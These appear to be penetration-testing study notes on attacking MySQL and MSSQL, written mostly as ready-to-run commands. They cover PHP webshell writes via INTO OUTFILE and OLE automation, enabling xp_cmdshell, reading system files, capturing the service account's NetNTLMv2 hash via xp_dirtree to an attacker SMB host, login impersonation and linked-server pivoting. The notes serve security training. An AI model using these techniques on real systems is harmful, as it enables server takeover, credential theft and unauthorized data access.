> See MySQL Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/MySQL (3306)|MySQL (3306)]] > See MSSQL Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/MSSQL (1433)|MSSQL (1433)]] # Introduction - MySQL and MSSQL are relational db mgmt systems that store data in tables, columns, and rows - Both use SQL for querying and maintaining the dbs - MSSQL default ports: TCP/1433, UDP/1434 - Hidden mode: TCP/2433 - MySQL default port: TCP/3306 # Authentication Mechanisms - MSSQL supports two types: - **Windows authentication mode**: integrates with Windows and AD auth methdos - **Mixed mode**: support auth by WIndows/AD and SQL server - MySQL supports simple username+password auth, Windows auth with a plugin, and others - [CVE-2012-2122](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/2383/mysql-database-authentication-bypass)  was a vuln in `MySQL 5.6.x` servers, among others, that allowed us to bypass authentication by repeatedly using the same incorrect password for the given account because the `timing attack` vulnerability existed in the way MySQL handled authentication attempts ## Misconfigurations - Anonymous access - Over allocated privs # Enumeration ```bash nmap -Pn -sV -sC -p1433 <target_ip> ``` # Access Tools - MySQL access ```bash mysql -u user -p<password> -h <target_ip> ``` --- - MSSQL access - use `sqlcmd` where only local auth available ![[images/Pasted image 20251017133427.png]] - use `sqsh` where network auth available ![[images/Pasted image 20251017133504.png]] ```cmd sqlcmd -S <target_ip> -U user -P '<password>' -C -- -C flag used to trust self-signed certs ``` --- ```bash sqsh -S <target_ip> -U user -P '<password>' -h #SQL auth is assumed sqsh -S <target_ip> -U SERVERNAME\\user -P '<password>' -h #windows auth sqsh -S <target_ip> -U .\\user -P '<password>' -h #local account windows auth ``` --- ```bash #use this impacket tool to enumerate users, dbs, and linked servers mssqlclient.py -p 1433 user@<target_ip> ``` # Default DBs ## MySQL default system schemas/databases: - `mysql` - is the system database that contains tables that store information required by the MySQL server - `information_schema` - provides access to database metadata - `performance_schema` - is a feature for monitoring MySQL Server execution at a low level - `sys` - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema ## MSSQL default system schemas/databases: - `master` - keeps the information for an instance of SQL Server. - `msdb` - used by SQL Server Agent. - `model` - a template database copied for each new database. - `resource` - a read-only database that keeps system objects visible in every database on the server in sys schema. - `tempdb` - keeps temporary objects for SQL queries. # SQL Syntax ## Using the `mySQL` tool ### Simple retrieval ```bash mysql> SHOW DATABASES; #shows available dbs --output-- mysql> USE db_name; --output-- mysql> SHOW TABLES; #shows tables --output-- mysql> SELECT * FROM tabele_name; #shows full table --output-- ``` ### Quasi command execution - no native command execution, but we can achieve command execution if we write to a location in the file system that can execute our commands ```bash mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; --output-- ``` ### Reading local files - We can also try reading local files ```bash mysql> select LOAD_FILE("/etc/passwd"); --output-- ``` --- ## Using the `sqlcmd` tool ### Simple retrieval ```cmd 1> SELECT name FROM master.dbo.sysdatabases #shows available dbs 2> GO --output-- 1> USE <db_name> 2> GO --output-- 1> SELECT table_name FROM <db_name>.INFORMATION_SCHEMA.TABLES #shows tables 2> GO --output-- 1> SELECT * FROM <table_name> #shows full table 2> GO --output-- ``` ### Command execution & writing files ```cmd 1> xp_cmdshell 'whoami' 2> GO --output-- ``` - If `xp_cmdshell` is not enabled, we can try the following to enable it assuming we have sufficient privs ```cmd -- To allow advanced options to be changed. 1> EXECUTE sp_configure 'show advanced options', 1 2> GO -- To update the currently configured value for advanced options. 1> RECONFIGURE 2> GO -- To enable the feature. 1> EXECUTE sp_configure 'xp_cmdshell', 1 2> GO -- To update the currently configured value for this feature. 1> RECONFIGURE 2> GO ``` - To write files, we first need to enable `Ole Atomation Procedures` ```cmd 1> sp_configure 'show advanced options', 1 2> GO 3> RECONFIGURE 4> GO 5> sp_configure 'Ole Automation Procedures', 1 6> GO 7> RECONFIGURE 8> GO ``` - Then, we can create a file ```cmd 1> DECLARE @OLE INT 2> DECLARE @FileID INT 3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT 4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1 5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>' 6> EXECUTE sp_OADestroy @FileID 7> EXECUTE sp_OADestroy @OLE 8> GO ``` ### Reading local files ```cmd 1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents 2> GO ``` # Capturing MSSQL Service Hash - Similar to creating a fake SMB server in [[5 - CPTS Notes/7 - Attacking Common Services/3 - SMB (139,445)#Forced Authentication Attacks|3 - SMB (139,445)]], we can also steal the MSSQL service account hash using `xp_subdirs` or `xp_dirtree` undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system - When we use one of these stored procedures and point it to our SMB server, the directory listening functionality will force the server to authenticate and send the NetNTLMv2 hash of the service account that is running the SQL Server - To this end, we can user `responder` or `impacket-smbserver` in tandem with some SQL queries ```bash #XP_SUBDIRS Hash Stealing with Responder sudo responder -I tun0 -- output with hash -- #XP_SUBDIRS Hash Stealing with impacket-smbserver sudo impacket-smbserver share ./ -smb2support -- output with hash -- ``` ```cmd -- XP_DIRTREE Hash Stealing 1> EXEC master..xp_dirtree '\\<kali_host_ip>\share\' 2> GO --output-- -- XP_SUBDIRS Hash Stealing 1> EXEC master..xp_subdirs '\\<kasli_host_ip>\share\' 2> GO --output-- ``` # Impersonate Existing Users with MSSQL - SQL Server has a special permission, named `IMPERSONATE`, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends. - First, let's identify users that we can impersonate - Sysadmins can impersonate anyone by default - For non-administrator users, privileges must be explicitly assigned ## Identify impersonation privs ```cmd 1> SELECT distinct b.name 2> FROM sys.server_permissions a 3> INNER JOIN sys.server_principals b 4> ON a.grantor_principal_id = b.principal_id 5> WHERE a.permission_name = 'IMPERSONATE' 6> GO -- shows list of users whom the current user cna impersonate ``` ## Verify current user and role ```cmd 1> SELECT SYSTEM_USER 2> SELECT IS_SRVROLEMEMBER('sysadmin') 3> go -- shows current user folowed by 0 if user is not a sysadmin or a 1 if user is a sysadmin ``` ## Impersonate target user ```cmd 1> USE master 2> EXECUTE AS LOGIN = 'target_user' 3> SELECT SYSTEM_USER 4> SELECT IS_SRVROLEMEMBER('sysadmin') 5> GO -- NOTE: run EXECUTE AS LOGIN within the master DB because all users have access, otherwise errors may occur -- we moved to master DB with the "USE master" command ``` # Communicate with other dbs with MSSQL - MSSQL has a feature called linked servers - Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another db product such as Oracle - Notably, if we have access to an SQL server with a link server configured, we may be able to move laterally ```cnd -- identify linked servers 1> SELECT srvname, isremote FROM sysservers 2> GO --output-- -- identify user associated with linked server 1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] 2> GO --output-- ```  - We can now execute queries with sysadmin privileges on the linked server  - As `sysadmin`, we control the SQL Server instance  - We can also read data from any database or execute system commands with `xp_cmdshell`